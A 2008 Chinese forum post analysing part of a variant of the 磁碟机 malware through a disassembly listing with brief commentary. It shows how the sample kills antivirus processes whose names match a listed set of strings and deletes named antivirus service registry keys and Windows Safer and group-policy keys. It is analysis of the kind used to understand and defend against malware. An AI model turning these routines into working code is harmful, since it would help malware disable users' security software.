|
|
以下内容只是磁碟机变种代码的一部分 懂汇编的朋友可以小研究下 !!!
00402111 |> /8D85 E4FEFFFF /LEA EAX,DWORD PTR SS:[EBP-11C]
00402117 |. |8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
0040211A |. |50 |PUSH EAX
0040211B |. |E8 32680000 |CALL <JMP.&MFC42.#860_??4CString@@QAEAB>
00402120 |. |8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00402123 |. |E8 24680000 |CALL <JMP.&MFC42.#4202_?MakeLower@CStri>
00402128 |. |68 54D44000 |PUSH setup.0040D454 ; rav
0040212D |. |8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00402130 |. |E8 11680000 |CALL <JMP.&MFC42.#2764_?Find@CString@@Q>
00402135 |. |3BC3 |CMP EAX,EBX
00402137 |. |75 77 |JNZ SHORT setup.004021B0
00402139 |. |68 50D44000 |PUSH setup.0040D450 ; avp
0040213E |. |8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00402141 |. |E8 00680000 |CALL <JMP.&MFC42.#2764_?Find@CString@@Q>
00402146 |. |3BC3 |CMP EAX,EBX
00402148 |. |75 66 |JNZ SHORT setup.004021B0
0040214A |. |68 48D44000 |PUSH setup.0040D448 ; twister
0040214F |. |8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00402152 |. |E8 EF670000 |CALL <JMP.&MFC42.#2764_?Find@CString@@Q>
00402157 |. |3BC3 |CMP EAX,EBX
00402159 |. |75 55 |JNZ SHORT setup.004021B0
0040215B |. |68 44D44000 |PUSH setup.0040D444 ; kv
00402160 |. |8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00402163 |. |E8 DE670000 |CALL <JMP.&MFC42.#2764_?Find@CString@@Q>
00402168 |. |3BC3 |CMP EAX,EBX
0040216A |. |75 44 |JNZ SHORT setup.004021B0
0040216C |. |68 3CD44000 |PUSH setup.0040D43C ; watch
00402171 |. |8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00402174 |. |E8 CD670000 |CALL <JMP.&MFC42.#2764_?Find@CString@@Q>
00402179 |. |3BC3 |CMP EAX,EBX
0040217B |. |75 33 |JNZ SHORT setup.004021B0
0040217D |. |68 34D44000 |PUSH setup.0040D434 ; kissvc
00402182 |. |8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00402185 |. |E8 BC670000 |CALL <JMP.&MFC42.#2764_?Find@CString@@Q>
0040218A |. |3BC3 |CMP EAX,EBX
0040218C |. |75 22 |JNZ SHORT setup.004021B0
0040218E |. |68 2CD44000 |PUSH setup.0040D42C ; scan
00402193 |. |8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00402196 |. |E8 AB670000 |CALL <JMP.&MFC42.#2764_?Find@CString@@Q>
0040219B |. |3BC3 |CMP EAX,EBX
0040219D |. |75 11 |JNZ SHORT setup.004021B0
0040219F |. |68 24D44000 |PUSH setup.0040D424 ; guard
004021A4 |. |8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
004021A7 |. |E8 9A670000 |CALL <JMP.&MFC42.#2764_?Find@CString@@Q>
004021AC |. |3BC3 |CMP EAX,EBX
004021AE |. |74 25 |JE SHORT setup.004021D5
004021B0 |> |FFB5 C8FEFFFF |PUSH DWORD PTR SS:[EBP-138] ; /ProcessId
004021B6 |. |6A 00 |PUSH 0 ; |Inheritable = FALSE
004021B8 |. |68 FF0F1F00 |PUSH 1F0FFF ; |Access = PROCESS_ALL_ACCESS
004021BD |. |FF15 60A04000 |CALL DWORD PTR DS:[<&KERNEL32.OpenProce>; \\OpenProcess
004021C3 |. |8BF0 |MOV ESI,EAX
004021C5 |. |85F6 |TEST ESI,ESI
004021C7 |. |74 09 |JE SHORT setup.004021D2
004021C9 |. |6A 01 |PUSH 1 ; /ExitCode = 1
004021CB |. |56 |PUSH ESI ; |hProcess
004021CC |. |FF15 64A04000 |CALL DWORD PTR DS:[<&KERNEL32.Terminate>; \\TerminateProcess
004021D2 |> |56 |PUSH ESI
004021D3 |. |FFD7 |CALL EDI
004021D5 |> |8D85 C0FEFFFF |LEA EAX,DWORD PTR SS:[EBP-140]
004021DB |. |50 |PUSH EAX ; /pProcessentry
004021DC |. |FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |hSnapshot
004021DF |. |E8 5C6A0000 |CALL <JMP.&KERNEL32.Process32Next> ; \\Process32Next
004021E4 |. |85C0 |TEST EAX,EAX
004021E6 |.^\\0F85 25FFFFFF \\JNZ setup.00402111
检测 进程名里是否包含rav,avp,twister,kv,watch,kissvc,scan,guard 如果有则TerminateProcess
之前的行为是通过加载netapi00.sys 恢复SSDT
之后是删除某些杀毒软件服务或者驱动键
004054BE . 57 PUSH EDI
004054BF . 6A 63 PUSH 63
004054C1 . 6A 69 PUSH 69
004054C3 . 6A 76 PUSH 76
004054C5 . 53 PUSH EBX
004054C6 . 57 PUSH EDI
004054C7 . 6A 53 PUSH 53
004054C9 . 58 POP EAX
004054CA . 50 PUSH EAX
004054CB . 6A 43 PUSH 43
004054CD . 6A 56 PUSH 56
004054CF . 50 PUSH EAX
004054D0 . 6A 50 PUSH 50
004054D2 . 6A 4D PUSH 4D
004054D4 . 6A 5C PUSH 5C
004054D6 . 6A 73 PUSH 73
004054D8 . 57 PUSH EDI
004054D9 . 6A 63 PUSH 63
004054DB . 6A 69 PUSH 69
004054DD . 6A 76 PUSH 76
004054DF . 53 PUSH EBX
004054E0 . 57 PUSH EDI
004054E1 . 50 PUSH EAX
004054E2 . 6A 5C PUSH 5C
004054E4 . 6A 74 PUSH 74
004054E6 . 57 PUSH EDI
004054E7 . 50 PUSH EAX
004054E8 . 6A 6C PUSH 6C
004054EA . 6A 6F PUSH 6F
004054EC . 53 PUSH EBX
004054ED . 6A 74 PUSH 74
004054EF . 6A 6E PUSH 6E
004054F1 . 6A 6F PUSH 6F
004054F3 . 6A 43 PUSH 43
004054F5 . 6A 74 PUSH 74
004054F7 . 6A 6E PUSH 6E
004054F9 . 57 PUSH EDI
004054FA . 53 PUSH EBX
004054FB . 53 PUSH EBX
004054FC . 6A 75 PUSH 75
004054FE . 6A 43 PUSH 43
00405500 . 6A 5C PUSH 5C
00405502 . 6A 4D PUSH 4D
00405504 . 6A 45 PUSH 45
00405506 . 6A 54 PUSH 54
00405508 . 50 PUSH EAX
00405509 . 6A 59 PUSH 59
0040550B . 50 PUSH EAX
0040550C . 8D45 EC LEA EAX,DWORD PTR SS:[EBP-14]
0040550F . 68 04DC4000 PUSH setup.0040DC04 ; %c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c
00405514 . 50 PUSH EAX
00405515 . E8 20340000 CALL <JMP.&MFC42.#2818_?Format@CString@@>
0040551A . 81C4 CC000000 ADD ESP,0CC
00405520 . 8D45 EC LEA EAX,DWORD PTR SS:[EBP-14]
00405523 . 8BCC MOV ECX,ESP
00405525 . 8965 E0 MOV DWORD PTR SS:[EBP-20],ESP
00405528 . 50 PUSH EAX
00405529 . E8 12340000 CALL <JMP.&MFC42.#535_??0CString@@QAE@AB>
此段命令执行后得到字串 SYSTEM\\CurrentControlSet\\Services\\MPSVCService
之后00401FE6 /$ B8 3C914000 MOV EAX,setup.0040913C
00401FEB |. E8 406A0000 CALL <JMP.&MSVCRT._EH_prolog>
00401FF0 |. 51 PUSH ECX
00401FF1 |. 53 PUSH EBX
00401FF2 |. 56 PUSH ESI
00401FF3 |. 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10]
00401FF6 |. 33DB XOR EBX,EBX
00401FF8 |. 50 PUSH EAX ; /pHandle
00401FF9 |. 68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS
00401FFE |. 53 PUSH EBX ; |Reserved => 0
00401FFF |. BE 02000080 MOV ESI,80000002 ; |
00402004 |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; |Subkey
00402007 |. 56 PUSH ESI ; |hKey => HKEY_LOCAL_MACHINE
00402008 |. FF15 3CA04000 CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKeyExA>] ; \\RegOpenKeyExA
0040200E |. 85C0 TEST EAX,EAX
00402010 |. 75 15 JNZ SHORT setup.00402027
00402012 |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; /SubKey
00402015 |. 56 PUSH ESI ; |hKey => HKEY_LOCAL_MACHINE
00402016 |. FF15 D8A34000 CALL DWORD PTR DS:[<&SHLWAPI.SHDeleteKeyA>] ; \\SHDeleteKeyA
0040201C |. FF75 F0 PUSH DWORD PTR SS:[EBP-10] ; /hKey
0040201F |. FF15 0CA04000 CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKey>] ; \\RegCloseKey
00402025 |. B3 01 MOV BL,1
00402027 |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
0040202B |. 8D4D 08 LEA ECX,DWORD PTR SS:[EBP+8]
0040202E |. E8 FF670000 CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402033 |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
00402036 |. 8AC3 MOV AL,BL
00402038 |. 5E POP ESI
00402039 |. 5B POP EBX
0040203A |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX
00402041 |. C9 LEAVE
00402042 \\. C3 RETN
删除服务
之后类似的方法删除的服务还有
之后删除的服务还有
0013E130 01060178 ASCII \"SYSTEM\\CurrentControlSet\\Services\\MPSVCService\"
0013E130 01060178 ASCII \"SYSTEM\\CurrentControlSet\\Services\\AntiVirService\"
0013E130 01060178 ASCII \"SYSTEM\\CurrentControlSet\\Services\\klif\"
0013E130 01060178 ASCII \"SYSTEM\\CurrentControlSet\\Services\\KAVBase\"
0013E130 01060178 ASCII \"SYSTEM\\CurrentControlSet\\Services\\ekrn\"
0013E130 01060178 ASCII \"SYSTEM\\CurrentControlSet\\Services\\SymEvent\"
0013E130 01060178 ASCII \"SYSTEM\\CurrentControlSet\\Services\\PAVSRV\"
0013E130 01060178 ASCII \"SYSTEM\\CurrentControlSet\\Services\\tmmbd\"
0013E130 01060178 ASCII \"SYSTEM\\CurrentControlSet\\Services\\McShield\"
0013E130 01060178 ASCII \"SYSTEM\\CurrentControlSet\\Services\\HookSys\"
还会删除SOFTWARE\\Policies\\Microsoft\\Windows\\Safer
Software\\Microsoft\\Windows\\CurrentVersion\\Group Policy Objects(组策略)
最后退出的方式
0040615F . FF75 A8 PUSH DWORD PTR SS:[EBP-58] ; /Title 0013E130 01060058 ASCII \"MCI Program Com Application\"
00406162 . FF75 EC PUSH DWORD PTR SS:[EBP-14] ; |Class = \"#32770\"
00406165 . FF15 30A44000 CALL DWORD PTR DS:[<&USER32.FindWindowA>; \\FindWindowA
0040616B . 50 PUSH EAX
0040616C . E8 0B280000 CALL <JMP.&MFC42.#2864_?FromHandle@CWnd>
00406171 . 85C0 TEST EAX,EAX
00406173 . 75 6F JNZ SHORT setup.004061E4
004061E4 > \\6A 00 PUSH 0 ; /status = 0
004061E6 . FF15 7CA34000 CALL DWORD PTR DS:[<&MSVCRT.exit>] ; \\exit
检测 名为“MCI Program Com Application”的窗口是否存在 |
|
发表于 2008-4-2 21:23:11
